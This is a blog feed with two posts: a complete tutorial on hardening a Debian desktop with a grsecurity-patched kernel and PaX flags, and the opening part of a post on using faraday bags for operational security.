Hardening Debian for the Desktop Using Grsecurity2016-01-15T00:00:00ZMicah Leeurn:uuid:ac3e4536-e302-32d3-81f9-c92bca06b5fa<p>I recently built a desktop system that I think is reasonably secure. It’s running Debian sid, also known as “unstable” — though in the Debian desktop world that just means you get to use the newest software. It’s just about as stable as “stable”, and besides, #yolo. It’s also running a <a href="https://grsecurity.net/">grsecurity</a>-patched Linux kernel and <a href="https://en.wikipedia.org/wiki/Grsecurity#PaX">PaX</a>, technologies that make Linux way more secure. Grsecurity protects you against memory corruption attacks, such as buffer overflows.</p>
<p>Last October I traveled to Moscow and <a href="https://theintercept.com/2015/11/12/edward-snowden-explains-how-to-reclaim-your-privacy/">interviewed Edward Snowden</a>. Here’s one of the things he told me:</p>
<blockquote><p>“Something that we haven’t seen that we need to see is a greater hardening of the overall kernels of every operating system through things like grsecurity, but unfortunately there’s a big usability gap between the capabilities that are out there, that are possible, and what is attainable for the average user.”</p>
</blockquote>
<p>Since I just set up Debian with a grsec kernel, I figured I’d write a tutorial for how to do it. It’s still a long way before the average user can take advantage of this stuff – it breaks everything, and the user needs to learn how to diagnose and fix it themselves – but I think that it’s well within the capabilities of Linux nerds who are comfortable using a terminal. You can probably also follow along no matter what Linux distribution you’re using. Also, I’m fairly new to grsecurity myself, so if you have tips or suggestions, or if I got something wrong, please post in the comments.</p>
<p>Grsecurity can be used with very little configuration. Just by baking it into your kernel, entire classes of exploits will fail to work against you, but those same exploits will succeed against someone running a vanilla Linux kernel. Grsecurity also lets you enforce access controls, but that’s outside the scope of this article. Just running a grsec kernel gives you a lot of protection for free.</p>
<p>First, I’m going to explain a little bit about what grsec is and how it protects you. Then I’m going to install Debian and upgrade it to sid. Then I’m going to download the Linux source code and the grsecurity patch, verify digital signatures, patch the Linux kernel, and finally compile it. (If you’ve never compiled the Linux kernel before, you’re in for a treat!) Then I’m going to show you how to use paxctl to turn off certain PaX protections on specific binaries so that they can run without crashing. And finally, I’m going to briefly show you how to troubleshoot grsec and PaX, so you can make software work that would otherwise crash, all on your own.</p>
<p><strong>How does grsecurity make Linux more secure?</strong></p>
<p>Memory corruption attacks normally work something like this: The target accepts malicious input into a program (maybe they load a GIF in an image viewing program, or a document in LibreOffice, or a malformed PGP public key in GnuPG). This input includes an exploit – some code that triggers a security bug in whatever software it’s targeting – as well as a small block of malicious code called shellcode. When the buggy software parses the input, the exploit takes over the flow of execution and jumps into the attacker’s shellcode. Shellcode can do many different things, but it commonly gives the attacker a remote shell – basically, letting them run commands on the victim’s computer (with the permissions of the user who was running the program that got hacked).</p>
<p>Grsecurity protects you by being extremely strict about which parts of memory are allowed to get executed. If it sees a program try to execute some code in the wrong part of memory, it kills the process, which will thwart attacks. So if a target using a grsec-patched kernel loads a malicious PDF in a vulnerable PDF reader, and it exploits a bug and tries to jump to shellcode, grsec will kill the process and log this to <code>/var/log/syslog</code>.</p>
<p>Unfortunately, grsec doesn’t know which programs are <em>supposed</em> to jump into user-loaded memory – it turns out quite a few programs do. For example, web browsers are able to load websites that include JavaScript. In order to improve performance, they convert the JavaScript code to machine code and then jump into it to execute it (this is called Just In Time compilation, or JIT). When grsec notices this, it will kill your web browser process.</p>
<p>You can still run a web browser with grsec, but you need to set a PaX flag (more on this below) to disable memory protections on that specific executable binary. This means your browser won’t immediately crash when you open it, but it also means that if an attacker is able to exploit a bug in it, they may be able to succeed in running their shellcode. Likewise, you often need to disable memory protection on programming language interpreters, such as <code>/usr/bin/python2</code>, <code>/usr/bin/python3</code>, and <code>/usr/lib/jvm/java-7-openjdk-amd64/jre/bin/java</code>.</p>
<p>So it’s not perfect. But even with disabling memory protections on specific binaries, you still get a lot of protection. Most programs work fine without having to disable any protections, and grsec makes it extremely hard for an attacker to escalate privileges. So if someone does manage to hack your web browser and get a shell, grsec will probably prevent them from getting root. Or if you’re a web developer and are running Apache with an old vulnerable WordPress on it that someone on your wifi notices and hacks, grsec will probably prevent them from accessing any data that isn’t readable from the <code>www-data</code> user, even if they come armed with Linux privilege escalation exploits.</p>
<p><strong>Installing Debian sid</strong></p>
<p>Debian doesn’t release sid installation images. Instead you need to install an earlier version of Debian and upgrade to sid. So go and grab the <a href="https://www.debian.org/distrib/netinst">latest stable netinst iso</a>, probably the amd64 one.</p>
<p>You also may want to verify the signature of the iso. As of this writing, the latest stable is 8.2.0, and the iso URL is <code>http://cdimage.debian.org/debian-cd/8.2.0/amd64/iso-cd/debian-8.2.0-amd64-netinst.iso</code>. If you drop the filename part of the path and just load <code>http://cdimage.debian.org/debian-cd/8.2.0/amd64/iso-cd/</code>, you’ll see several files to downloading, including <code>SHA512</code> and <code>SHA512.sign</code>. Download both of those. The <code>SHA512</code> file contains <code>SHA512</code> checksums of all of the isos for that version of Debian, including <code>debian-8.2.0-amd64-netinst.iso</code>.</p>
<p>Make sure you have the key that Debian uses to sign their releases. You can <a href="https://www.debian.org/CD/verify">find its fingerprint here</a>. For Debian 8, the signing key fingerprint is <code>DF9B 9C49 EAA9 2984 3258 9D76 DA87 E80D 6294 BE9B</code> (as of the time of writing), and you can get the key by running this:</p>
<pre><code>$ gpg --recv-keys DF9B9C49EAA9298432589D76DA87E80D6294BE9B
</code></pre>
<p>Now you can verify the signature:</p>
<pre><code>$ gpg --verify SHA512SUMS.sign
gpg: assuming signed data in 'SHA512SUMS'
gpg: Signature made Fri 11 Sep 2015 08:13:34 AM PDT using RSA key ID 6294BE9B
gpg: Good signature from "Debian CD signing key <debian-cd@lists.debian.org>" [unknown]
gpg: WARNING: This key is not certified with a trusted signature!
gpg: There is no indication that the signature belongs to the owner.
Primary key fingerprint: DF9B 9C49 EAA9 2984 3258 9D76 DA87 E80D 6294 BE9B
</code></pre>
<p>Make sure it says <code>Good signature from "Debian CD signing key <debian-cd@lists.debian.org>"</code>. Great! Now, take a SHA512 checksum of the iso (note that your checksum might be different, if you’ve downloaded a newer version of Debian than I did):</p>
<pre><code>$ sha512sum debian-8.2.0-amd64-netinst.iso
923cd1bfbfa62d78aecaa92d919ee54a95c8fca834b427502847228cf06155e7243875f59279b0bf6bfd1b579cbe2f1bc80528a265dafddee9a9d2a197ef3806 debian-8.2.0-amd64-netinst.iso
</code></pre>
<p>Now let’s check to see if that checksum is in the SHA512 file.</p>
<pre><code>$ cat SHA512SUMS | grep 923cd1bfbfa62d78aecaa92d919ee54a95c8fca834b427502847228cf06155e7243875f59279b0bf6bfd1b579cbe2f1bc80528a265dafddee9a9d2a197ef3806
923cd1bfbfa62d78aecaa92d919ee54a95c8fca834b427502847228cf06155e7243875f59279b0bf6bfd1b579cbe2f1bc80528a265dafddee9a9d2a197ef3806 debian-8.2.0-amd64-netinst.iso
</code></pre>
<p>Great, the signed <code>SHA512</code> file shows the same checksum for <code>debian-8.2.0-amd64-netinst.iso</code> that I got manually. This means that I’ve confirmed that the Debian netinst iso I downloaded hasn’t been tampered with.</p>
<p>Finally, burn the iso to a CD or <code>dd</code> it to a USB stick, boot to it, and install Debian.</p>
<p>Note that when it asks for you to come up with a root password, you can leave it blank. If you do this, then Debian will make your user a sudoer. This might be more familiar to you if you’re used to Ubuntu or Mac OS X.</p>
<p>When you get to the “Partition disks” screen, choose “Guided – use entire disk and set up encrypted LVM” in order to set up full disk encryption. You’ll need to come up with a <a href="https://theintercept.com/2015/03/26/passphrases-can-memorize-attackers-cant-guess/">strong passphrase</a>.</p>
<p><img src="grsec1.png" alt="Full disk encryption"></p>
<p>When you get to the “Software selection” screen, make sure to select GNOME as your desktop environment. That’s what I’m using, and this tutorial includes setting a PaX flag to make GNOME work.</p>
<p><img src="grsec2.png" alt="Install GNOME desktop environment"></p>
<p>Reboot into your freshly installed Debian, mount your encrypted hard drive, and login. Now it’s time to upgrade from stable to sid. Open a terminal and edit the /etc/apt/source.list file as root.</p>
<p>It starts out looking like this:</p>
<pre><code>#
# deb cdrom:[Debian GNU/Linux 8.2.0 _Jessie_ - Official amd64 NETINST Binary-1 20150906-11:09]/ jessie main
#deb cdrom:[Debian GNU/Linux 8.2.0 _Jessie_ - Official amd64 NETINST Binary-1 20150906-11:09]/ jessie main
deb http://ftp.us.debian.org/debian/ jessie main
deb-src http://ftp.us.debian.org/debian/ jessie main
deb http://security.debian.org/ jessie/updates main
deb-src http://security.debian.org/ jessie/updates main
# jessie-updates, previously known as 'volatile'
deb http://ftp.us.debian.org/debian/ jessie-updates main
deb-src http://ftp.us.debian.org/debian/ jessie-updates main
</code></pre>
<p>We can delete the cdrom comments, and also we can delete the security and updates repositories. Since we’re updating to sid, we get all of the latest versions of all packages, which already includes security updates. And finally, change the “jessie” to “sid”, so that the result file looks like this:</p>
<pre><code>deb http://ftp.us.debian.org/debian/ sid main
deb-src http://ftp.us.debian.org/debian/ sid main
</code></pre>
<p>Save and exit. Now, update all of the software. This will take awhile. And finally, reboot into sid.</p>
<pre><code>$ sudo apt-get update
$ sudo apt-get dist-upgrade
$ sudo apt-get autoremove
$ sudo reboot
</code></pre>
<p><strong>Compiling the grsec-patched Linux kernel</strong></p>
<p>The Debian wiki’s <a href="https://wiki.debian.org/grsecurity">grsecurity page</a> implies that linux-grsec is packaged in sid already, but it <a href="https://packages.debian.org/search?suite=sid&searchon=names&keywords=linux-grsec">doesn’t seem available</a> yet. In the future this will be much simpler, but for now we can compile the Linux kernel ourselves.</p>
<p><strong>Update:</strong> Grsecurity is indeed packaged in sid. The package name (right now) is <code>linux-image-4.3.0-1-grsec-amd64</code>, so you can apt-get install that instead of compiling it yourself if you want.</p>
<p><a href="https://xkcd.com/456/"><img src="xkcd-cautionary.png" alt="Cautionary"></a></p>
<p>Start by installing dependencies:</p>
<pre><code>$ sudo apt-get install libncurses5-dev build-essential fakeroot kernel-package gcc-5 gcc-5-plugin-dev make
</code></pre>
<p>Download the public keys that are used to sign the Linux kernel source as well as the grsecurity patch. You can find the latest Linux kernel signing key <a href="https://kernel.org/category/signatures.html">here</a>, and you you can find the latest grsecurity signing key at the bottom of <a href="https://grsecurity.net/download.php">this page</a>.</p>
<p>At the time of writing, here’s how to download the two signing keys:</p>
<pre><code>$ gpg --recv-keys 647F28654894E3BD457199BE38DBBDC86092693E
$ gpg --recv-keys DE9452CE46F42094907F108B44D1C0F82525FE49
</code></pre>
<p>Now download the Linux source code and the grsecurity patch. You’re going to need to download the latest stable version (not any of the longterm versions), because the grsecurity project only releases that version publicly. Because these versions numbers change constantly, I’m not going to provide direct links.</p>
<p>Download the latest stable Linux source, as well as the associated PGP signature file, from kernel.org. The files I’m downloading are called <code>linux-4.3.3.tar.xz</code> and <code>linux-4.3.3.tar.sign</code>.</p>
<p>Download the corresponding grsecurity patch, as well as the associated PGP signature file, from grsecurity.net. This will be under the header “test kernel patch”. The files I’m downloading are called <code>grsecurity-3.1-4.3.3-201601051958.patch</code> and <code>grsecurity-3.1-4.3.3-201601051958.patch.sig</code>.</p>
<p>If you’re following along with a version of Linux that’s newer than 4.3.3, type the following instructions yourself instead of copying and pasting, so that the commands correspond with the version of Linux and grsec that you downloaded.</p>
<p>Decompress the Linux source code.</p>
<pre><code>$ unxz linux-4.3.3.tar.xz
</code></pre>
<p>Verify the signatures. The output of both of these should say “Good signature”.</p>
<pre><code>$ gpg --verify linux-4.3.3.tar.sign
$ gpg --verify grsecurity-3.1-4.3.3-201601051958.patch.sig
</code></pre>
<p>If all went well, extract the Linux source code and then apply the grsec patch.</p>
<pre><code>$ tar -xf linux-4.3.3.tar
$ cd linux-4.3.3/
$ patch -p1 < ../grsecurity-3.1-4.3.3-201601051958.patch
</code></pre>
<p>Start with your existing Linux kernel configuration. Note that it’s possible that your config file might be named differently if you currently have a different version of the Linux kernel installed, so make sure you use the right filename.</p>
<pre><code>$ cp /boot/config-4.3.0-1-amd64 .config
$ make menuconfig
</code></pre>
<p>Navigate to Security options, Grsecurity, and make sure it’s enabled. Then go to Configuration Method and set it to Automatic. Go to Usage Type and change it to Desktop. Go to <code>Virtualization Type</code> and set it to None (unless you’re testing this in a VM, then make sure you choose the right hypervisor). Go to <code>Required Properties</code> and set it to <code>Security</code>.</p>
<p><img src="grsec3.png" alt="Linux kernel options"></p>
<p>Now save and exit.</p>
<p>You can use all of your CPU cores to make compiling the Linux kernel faster by running this.</p>
<pre><code>$ export CONCURRENCY_LEVEL="$(grep -c '^processor' /proc/cpuinfo)"
</code></pre>
<p>Now compile the kernel. This will probably take a really long time. When you’re done you’ll have a deb file you can install.</p>
<pre><code>$ fakeroot make-kpkg --initrd kernel_image
</code></pre>
<p>When this finishes, install the new Linux kernel image.</p>
<pre><code>$ cd ..
$ sudo dpkg -i linux-image-4.3.3-grsec_4.3.3-grsec-10.00.Custom_amd64.deb
</code></pre>
<p>Now let’s make sure you GRUB boots into this kernel image by default. Figure out what the kernel version string that GRUB will use is called.</p>
<pre><code>$ grep menuentry /boot/grub/grub.cfg | cut -d "'" -f2 | grep "grsec$"
Debian GNU/Linux, with Linux 4.3.3-grsec
</code></pre>
<p>Now edit <code>/etc/default/grub</code> and change the <code>GRUB_DEFAULT=</code> line be to <code>"Advanced options for Debian GNU\/Linux></code> followed by the kernel version string. Put the whole things in quotes, like this: <code>GRUB_DEFAULT="Advanced options for Debian GNU\/Linux>Debian GNU/Linux, with Linux 4.3.3-grsec"</code></p>
<p><img src="grsec4.png" alt="GRUB config"></p>
<p>Save and exit, and then upgrade grub.</p>
<pre><code>$ sudo update-grub
</code></pre>
<p>Before rebooting into the grsec kernel, we need to install PaX tools, which will let us disable memory protections on specific userland binaries.</p>
<pre><code>$ sudo apt-get install paxtest paxctl
$ sudo reboot
</code></pre>
<p>When you boot into the new kernel, everything will be broken.</p>
<p>This is because grsec is killing the <code>gnome-shell</code> process. In order to make your desktop environment work, you need to disable memory protections on the <code>gnome-shell</code> binary.</p>
<p>Press Ctrl-Alt F1 to switch to tty1 and login without graphics. Then disable memory protections on <code>/usr/bin/gnome-shell</code> using <code>paxctl</code> (more on how this tool works below).</p>
<p><img src="grsec5.png" alt="Fix gnome-shell"></p>
<p>Here’s the command to run.</p>
<pre><code>$ sudo paxctl -cm /usr/bin/gnome-shell
</code></pre>
<p>Reboot again, and this time GNOME should work.</p>
<pre><code>$ sudo reboot
</code></pre>
<p>Login to your account, and open a terminal to do a few final steps.</p>
<p>Edit <code>/etc/sysctl.conf</code> (as root) and add these lines:</p>
<pre><code>kernel.grsecurity.rwxmap_logging = 0
kernel.grsecurity.grsec_lock = 1
</code></pre>
<p>And activate them.</p>
<pre><code>$ sudo sysctl -p
</code></pre>
<p>Now, make sure that grsecurity is really working like it should.</p>
<pre><code>$ paxtest blackhat
PaXtest - Copyright(c) 2003,2004 by Peter Busser
Released under the GNU Public Licence version 2 or later
Writing output to /home/micah/paxtest.log
It may take a while for the tests to complete
Test results:
PaXtest - Copyright(c) 2003,2004 by Peter Busser
Released under the GNU Public Licence version 2 or later
Mode: Blackhat
Linux rey 4.3.3-grsec #3 SMP Mon Jan 11 12:42:40 PST 2016 x86_64 GNU/Linux
Executable anonymous mapping : Killed
Executable bss : Killed
Executable data : Killed
Executable heap : Killed
Executable stack : Killed
Executable shared library bss : Killed
Executable shared library data : Killed
Executable anonymous mapping (mprotect) : Killed
Executable bss (mprotect) : Killed
Executable data (mprotect) : Killed
Executable heap (mprotect) : Killed
Executable stack (mprotect) : Killed
Executable shared library bss (mprotect) : Killed
Executable shared library data (mprotect): Killed
Writable text segments : Killed
Anonymous mapping randomisation test : 28 bits (guessed)
Heap randomisation test (ET_EXEC) : 23 bits (guessed)
Heap randomisation test (PIE) : 35 bits (guessed)
Main executable randomisation (ET_EXEC) : 28 bits (guessed)
Main executable randomisation (PIE) : 28 bits (guessed)
Shared library randomisation test : 28 bits (guessed)
Stack randomisation test (SEGMEXEC) : 35 bits (guessed)
Stack randomisation test (PAGEEXEC) : 35 bits (guessed)
Arg/env randomisation test (SEGMEXEC) : 39 bits (guessed)
Arg/env randomisation test (PAGEEXEC) : 39 bits (guessed)
Randomization under memory exhaustion @~0: 29 bits (guessed)
Randomization under memory exhaustion @0 : 28 bits (guessed)
Return to function (strcpy) : paxtest: return address contains a NULL byte.
Return to function (memcpy) : Killed
Return to function (strcpy, PIE) : paxtest: return address contains a NULL byte.
Return to function (memcpy, PIE) : Killed
</code></pre>
<p>Congratulations, you’re running Debian with a hardened grsecurity kernel! But you’re not done yet. Lots of your software is going to crash as soon as your run it. The next section shows you how to fix that.</p>
<p><em>Thanks to the Kevin Gallagher and the <a href="https://freedom.press/">Freedom of the Press Foundation</a> staff for making a great <a href="https://gist.github.com/ageis/a91f36ca99c252291a00">guide</a> that I mostly based this section off of.</em></p>
<p><strong>Setting PaX flags so you can actually use your computer</strong></p>
<p>Grsecurity automatically kills processes that use memory in a way that could be an attack. But many programs legitimately use memory this way. In order to use those programs, you need to set PaX flags on their binaries — these flags actually get stored in the binary file’s header. <code>paxctl</code> is a program that lets you view and set these flags.</p>
<pre><code>$ sudo paxctl -h
PaX control v0.9
Copyright 2004,2005,2006,2007,2009,2010,2011,2012,2014 PaX Team
usage: paxctl
options:
-p: disable PAGEEXEC -P: enable PAGEEXEC
-e: disable EMUTRAMP -E: enable EMUTRAMP
-m: disable MPROTECT -M: enable MPROTECT
-r: disable RANDMMAP -R: enable RANDMMAP
-x: disable RANDEXEC -X: enable RANDEXEC
-s: disable SEGMEXEC -S: enable SEGMEXEC
-v: view flags -z: restore default flags
-q: suppress error messages -Q: report flags in short format
-c: convert PT_GNU_STACK into PT_PAX_FLAGS (see manpage!)
-C: create PT_PAX_FLAGS (see manpage!)
</code></pre>
<p>Earlier we ran <code>paxctl -cm /usr/bin/gnome-shell</code>. The <code>-c</code> modified the binary so that it’s able to accept PaX flags, and the <code>-m</code> disabled <code>MPROTECT</code> — basically meaning that that specific binary is allowed to do stuff that grsec would kill other binaries it caught doing. You can view the flags that are set like this.</p>
<pre><code>$ sudo paxctl -v /usr/bin/gnome-shell
PaX control v0.9
Copyright 2004,2005,2006,2007,2009,2010,2011,2012,2014 PaX Team
- PaX flags: -----m-x-e-- [/usr/bin/gnome-shell]
MPROTECT is disabled
RANDEXEC is disabled
EMUTRAMP is disabled
</code></pre>
<p>For the most part, all you’ll ever need to do is use <code>paxctl -cm</code> on a binary that you trust to run without <code>MPROTECT</code>. You can always run <code>paxctl -M</code> to enable <code>MPROTECT</code> on it again.</p>
<p>There’s also a cool looking project called <a href="https://github.com/subgraph/paxrat">paxrat</a>, developed by Subgraph, that helps you manage PaX flags. It’s not yet packaged for Debian, and I haven’t yet tested it out, but I look forward to playing with it. For now we can just use paxctl.</p>
<p>To start, let’s set PaX flags for some GRUB binaries.</p>
<pre><code>$ sudo paxctl -cpm /usr/sbin/grub-probe
$ sudo paxctl -cpm /usr/sbin/grub-mkdevicemap
$ sudo paxctl -cpm /usr/sbin/grub-install
$ sudo paxctl -cpm /usr/bin/grub-script-check
$ sudo paxctl -cpm /usr/bin/grub-mount
</code></pre>
<p>And python interpreters.</p>
<pre><code>$ sudo paxctl -cm /usr/bin/python2
$ sudo paxctl -cm /usr/bin/python3
</code></pre>
<p>One issue I’ve run into when trying to set PaX flags with <code>paxctl</code> is an error message that says “Text file busy”. If you run into this issue, you can kill any processes of that binary that are running and then try again. If you have a hard time keeping a process killed, you might try rebooting into recovery mode to set its PaX flags.</p>
<p>How do you know what binaries you should set PaX flags on? Grsec logs its error messages to <code>/var/log/syslog</code>, so let’s start by opening a new terminal and watching all of the grsec error messages that scroll by.</p>
<pre><code>$ sudo tail -f /var/log/syslog | grep grsec
</code></pre>
<p>Now, in a new terminal window, try opening Iceweasel by running its binary.</p>
<pre><code>$ iceweasel
Gtk-Message: Failed to load module "canberra-gtk-module"
Killed
</code></pre>
<p>Iceweasel was killed by grsec, and here’s the error message that was logged to <code>/var/log/syslog</code>.</p>
<pre><code>Jan 11 18:18:25 debian kernel: [ 286.128581] grsec: denied resource by requesting 4096 for RLIMIT_CORE against limit 0 for /usr/lib/iceweasel/iceweasel[iceweasel:1991] uuid/euid:1000/1000 gid:egid:1000/1000, parent /bin/bash[1417] uid/euid:1000/1000 gid/egid:1000/1000
</code></pre>
<p>The important bits there are grsec: <code>denied resource and /usr/lib/iceweasel/iceweasel</code>. (Note that <code>/usr/bin/iceweasel</code> is a symlink to <code>/usr/lib/iceweasel/iceweasel</code>, so this is in fact the Iceweasel binary.)</p>
<p>If you want to use Iceweasel (and risk turning off its memory protections), then use paxctl to disable <code>MPROTECT</code>.</p>
<pre><code>$ sudo paxctl -cm /usr/lib/iceweasel/iceweasel
</code></pre>
<p>Now trying running iceweasel again. It should just open this time!</p>
<p>Now, try opening a new tab. My syslog window throws two more errors.</p>
<pre><code>Jan 11 18:26:48 debian kernel: [ 788.651798] grsec: denied resource overstep by requesting 4096 for RLIMIT_CORE against limit 0 for /usr/lib/iceweasel/plugin-container[Web Content:2100] uid/euid:1000/1000 gid/egid:1000/1000, parent /usr/lib/iceweasel/iceweasel[Gecko_IOThread:2041] uid/euid:1000/1000 gid/egid:1000/1000
Jan 11 18:26:48 debian kernel: [ 788.818013] grsec: denied resource overstep by requesting 4096 for RLIMIT_CORE against limit 0 for /usr/lib/iceweasel/plugin-container[Web Content:2114] uid/euid:1000/1000 gid/egid:1000/1000, parent /usr/lib/iceweasel/iceweasel[Gecko_IOThread:2041] uid/euid:1000/1000 gid/egid:1000/1000
</code></pre>
<p>It looks like each time you open a tab, Iceweasel tries running <code>/usr/lib/iceweasel/plugin-container</code> in a subprocess, and grsec kills that process. However, Iceweasel appears to work fine without it, so no big deal. Since it hasn’t affected me yet, I’m going to keep <code>MPROTECT</code> enabled on that binary. If you need to run a plugin in Iceweasel and grsec prevents that from working, then you might consider disabling <code>MPROTECT</code>.</p>
<p>Let’s try another: Tor Browser. The easiest way to install Tor Browser is to use <a href="https://github.com/micahflee/torbrowser-launcher">Tor Browser Launcher</a> (a piece of software I wrote… ehem.)</p>
<p>Edit <code>/etc/apt/sources.list</code> as root, add the “contrib” repository.</p>
<pre><code>deb http://ftp.us.debian.org/debian/ sid main contrib
deb-src http://ftp.us.debian.org/debian/ sid main contrib
</code></pre>
<p>Now install Tor Browser Launcher.</p>
<pre><code>$ sudo apt-get update
$ sudo apt-get install torbrowser-launcher
</code></pre>
<p>Now try launching Tor Browser.</p>
<pre><code>$ torbrowser-launcher
</code></pre>
<p>It should pop up a window and download the Tor Browser tarball for the first time. It should also download its PGP signature, verify the signature, extract the tarball, and then try to launch Tor Browser. But when it does, grsec kills the process.</p>
<pre><code>Jan 11 18:38:24 debian kernel: [ 1485.423982] grsec: denied resource overstep by requesting 4096 for RLIMIT_CORE against limit 0 for /home/micah/.local/share/torbrowser/tbb/x86_64/tor-browser_en-US/Browser/firefox[firefox:3954] uid/euid:1000/1000 gid/egid:1000/1000, parent /lib/systemd/systemd[systemd:1] uid/euid:0/0 gid/egid:0/0
</code></pre>
<p>Tor Browser is trying to run the <code>/home/micah/.local/share/torbrowser/tbb/x86_64/tor-browser_en-US/Browser/firefox</code> binary, and it fails for the exact same reason that Iceweasel fails. To fix it, disable <code>MPROTECT</code> on that binary.</p>
<pre><code>$ sudo paxctl -cm /home/micah/.local/share/torbrowser/tbb/x86_64/tor-browser_en-US/Browser/firefox
$ torbrowser-launcher
</code></pre>
<p>This time, Tor Browser will launch without any crashes or grsec errors.</p>
<p><strong>How does Debian with grsecurity compare to Qubes?</strong></p>
<p>I’ve <a href="https://micahflee.com/2014/04/the-operating-system-that-can-protect-you-even-if-you-get-hacked/">written in the past</a> about how awesome <a href="https://www.qubes-os.org/">Qubes</a> is, which is also a reasonably secure operating system. So how does it compare to Debian with a grsec kernel?</p>
<p>In Qubes, you separate your computer into different security domains (also known as AppVMs), but in each of these domains you’re basically running a normal, non-hardened OS. If an attacker hacks you, they only have access to data in a single security domain, and the rest of your data remains safe. In Debian/grsec — like in every non-Qubes operating system that’s currently available, including Windows, Mac OS X, Ubuntu, Arch, etc. — you only have one security domain, so if an attacker hacks you it’s basically game over. But grsec makes it harder for an attacker to successfully hack you. (I’m looking forward to the release <a href="https://subgraph.com/sgos/">Subgraph OS</a>, which will be the second desktop operating system designed for compartmentalization, and which will be based on Debian, grsec, and Linux containers.)</p>
<p>For example, let’s say an attacker sends you a malicious PDF that secretly exploits a bug in Evince, a popular Linux PDF viewer. Pretend you’re running Qubes and decide to open this PDF in your “personal” security domain that you use for non-work related stuff (really you should open it in a disposable VM, but maybe you didn’t think it was that risky or something). The PDF exploits the bug in Evince and jumps into the attacker’s shellcode, and now the attacker can run whatever commands they want and access any of your data, but only within your “personal” AppVM. They can’t access any of the files in your “work” domain, or your “email” domain, or the networkless “vault” domain that you use to store your PGP secret keys and password databases.</p>
<p>Now pretend you’re running Debian/grsec. You open the PDF, it exploits the bug in Evince and tries to jump to the attacker’s shellcode, but grsec detects that your Evince process is trying to execute code in an off-limits part of memory and kills the process. Evince immediately closes, grsec logs an error to syslog, and you don’t get hacked at all. In this case, grsec completely prevented the attack, while Qubes only contained it.</p>
<p>But now let’s change the example. Instead of Evince, the attacker is exploiting a bug in Iceweasel. If you’re using Qubes, the attacker only hacks the domain that you’re running Iceweasel in. If you’re using Debian/grsec (and you disabled <code>MPROTECT</code> on <code>/usr/lib/iceweasel/iceweasel</code> like we did above), the attacker’s shellcode will run and they’ll have access to all of your files, be able to log your keystrokes, etc. They might have a very difficult time getting root, which will make it harder for them to install a persistent backdoor, but that’s little consolation.</p>
<p>Hardening your kernel with grsecurity is great because it makes it much harder for attacks against you to succeed, but it still doesn’t make it so you can compartmentalize your computer the way that Qubes does. It’s also important to remember that grsec mostly protects you against memory corruption bugs, but other types of security issues exist too. You might run an ssh server and use a crappy password. You might get tricked into copying and pasting something malicious into your terminal. You might be running buggy software that can be exploited without jumping into forbidden memory space, so grsec won’t catch it.</p>
<p>There’s another big difference between Qubes and Debian/grsec: Usability.</p>
<p>Qubes isn’t terribly hard to use (for experienced Linux nerds), but it does require shifting the paradigm about how you think about operating systems, and working around software that isn’t designed for it. For example, it’s not uncommon to have four or five different web browsers open at the same time, all running in different security domains for different purposes. If someone sends you a link, you can’t just click it. You have to decide which domain you’d like to open it in first, and then copy it into that domain’s clipboard before pasting it into a browser. There’s also still a lot of work to be done to make USB devices usable in Qubes. If you want to do some Android development, it’s not the simplest task yet to get Android Studio installed and communicating with your phone over a USB port in an AppVM. Same with video chat. And same with figuring out a workflow to take a screenshot, crop it, and then tweet it. Many tasks are complicated in Qubes simply because you have to deal with compartmentalization and the limitations of virtualizing all of your software — but this is also what gives Qubes its strength.</p>
<p>Debian with grsec doesn’t require this paradigm shift. Once you get past the initial PaX learning curve and make sure that the software you use most often all works, then it’s just like using any other operating system — but you get the invisible-but-awesome benefits of having a hardened kernel. USB devices, webcams, screenshots, and everything else work just like you’re used to. So if you’re not quite ready for Qubes, or if you can’t run Qubes for your specific work for whatever reason, Debian/grsec might be a good choice for you.</p>
<p>The best of both worlds would be running Qubes, but with AppVMs that have grsecurity-patched Linux kernels. This is entirely possible, but no one has yet succeeded in doing it.</p>
Some Thoughts on Faraday Bags and Operational Security2015-11-25T00:00:00ZMicah Leeurn:uuid:1d5cf9c2-af69-3bd4-ada3-6713b41a09a7<p>I recently took a trip to Moscow to <a href="https://theintercept.com/2015/11/12/edward-snowden-explains-how-to-reclaim-your-privacy/">interview National Security Agency whistblower Edward Snowden</a> about operational security. In the article I published on The Intercept, I mentioned that I used a faraday bag.</p>
<blockquote><p>Our first meeting would be in the hotel lobby, and I arrived with all my important electronic gear in tow. I had powered down my smartphone and placed it in a “faraday bag” designed to block all radio emissions.</p>
</blockquote>
<p>Since I published my interview, many people have asked me for more information about this faraday bag — which product did I get, what does it protect against, how does it work? So here are some quick thoughts on the topic.</p>
<p><strong>What are faraday bags?</strong></p>
<p>Faraday bags, or more generally, <a href="https://en.wikipedia.org/wiki/Faraday_cage">faraday cages</a>, are named after the brilliant scientist Michael Faraday. If you’re a nerd, I recommend watching the <a href="https://en.wikipedia.org/wiki/The_Electric_Boy">10th episode</a> of Neil DeGrasse Tyson’s Cosmos to learn more about him.</p>
<p>They’re made of a material that blocks electric fields from passing through it. Smartphones have a ton of different built-in radios: GSM, CDMA, 2G, 3G, 4G, wifi, bluetooth, NFC, GPS, and others. Each of these communicates wirelessly by sending and receiving information through the air in the form of radio emissions on different frequencies. If you put your smartphone inside of a faraday bag, it might be listening for incoming radio emissions, but none will reach it, and it might be attempting to communicate to the outside, but all of its messages will fail to penetrate the bag.</p>
<p><strong>Which one should I buy?</strong></p>
<p>I bought my faraday bag on Amazon. I didn’t have a particular product in mind; I basically just read reviews and got a nice one that was a little on the bigger side so that I could fit multiple phones, and also my passport (which has an RFID chip, which also communicates using radio emissions).</p>
<p>It doesn’t particularly matter which product you choose, but make sure that you test it after you get it to confirm that it works. Testing it is easy enough. Put your phone inside the bag, and then use another phone to try calling it. If your phone rings, it doesn’t work. You can also test data in a similar fashion — try sending yourself a notification over data (like a Facebook message) and see if your phone receives it while it’s inside the bag.</p>
<p><strong>Why might this be useful for operational security?</strong></p>
<p>First, assume that your smartphone is hacked and that the attacker can utilize all of its radios and sensors. Also assume that your attacker can get information from third party companies, such as your cell phone carrier, which will know your location and be in a position to eavesdrop on much of your phone usage.</p>
<p>Smartphones are crazy useful, so it sucks to not use them just because you can’t trust them. Instead, you can use faraday bags to <em>selectively keep certain information away from your phone</em>, despite the fact that you can’t trust it.</p>
<p>If you carry your phone around with you, your attacker gets to learn your location. From when you turn on your phone after your airplane lands, to taking public transit or a taxi to your hotel, to going out for dinner or drinks, or anything else — the attacker can see your exact location.</p>
